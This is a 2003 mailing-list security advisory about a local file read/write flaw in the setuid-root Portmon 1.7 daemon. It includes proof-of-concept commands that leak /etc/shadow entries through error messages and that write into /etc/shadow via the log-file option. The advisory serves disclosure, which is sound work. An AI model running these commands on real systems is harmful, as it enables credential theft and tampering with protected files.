Portmon file arbitrary read/write access vulnerability Jun 16 2003 11:54PM
Luca Ercoli (luca ercoli inwind it)

Package: Portmon

Auth: http://www.aboleo.net/

Version(s): 1.7 (prior ?)

Vulnerability: File arbitrary read/write access


Portmon is a network service monitoring daemon


"In order to use ping support, Portmon must run as root

or be installed setuid with root permissions

due to the fact that it must open up a raw socket."

The product suffer from a security problem that allows

any local user to read/write protected files on the system.

This is dude to a hole in the way the program handles

loading of two configuration files: host file/log file.

Example (read):

[lucae@linux lucae]$portmon -c /etc/shadow

Unable to resolve hostname


Unable to resolve hostname bin:*:12172:0:99999:7:::

Unable to resolve hostname daemon:*:12172:0:99999:7:::

Unable to resolve hostname adm:*:12172:0:99999:7:::

Unable to resolve hostname lp:*:12172:0:99999:7:::

Unable to resolve hostname sync:*:12172:0:99999:7:::

Unable to resolve hostname shutdown:*:12172:0:99999:7:::

Unable to resolve hostname halt:*:12172:0:99999:7:::

Unable to resolve hostname mail:*:12172:0:99999:7:::

Unable to resolve hostname news:*:12172:0:99999:7:::


Example (write):

[lucae@linux lucae]$portmon -l /etc/shadow

fopen: No such file or directory

Failed reading config file hosts

[root@linux root]#cat /etc/shadow





(Mon Jun 16 01:40:17 2003) - Portmon started by user

lucae //line added

[root@linux root]#

Luca Ercoli luca.ercoli[at]inwind.it

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus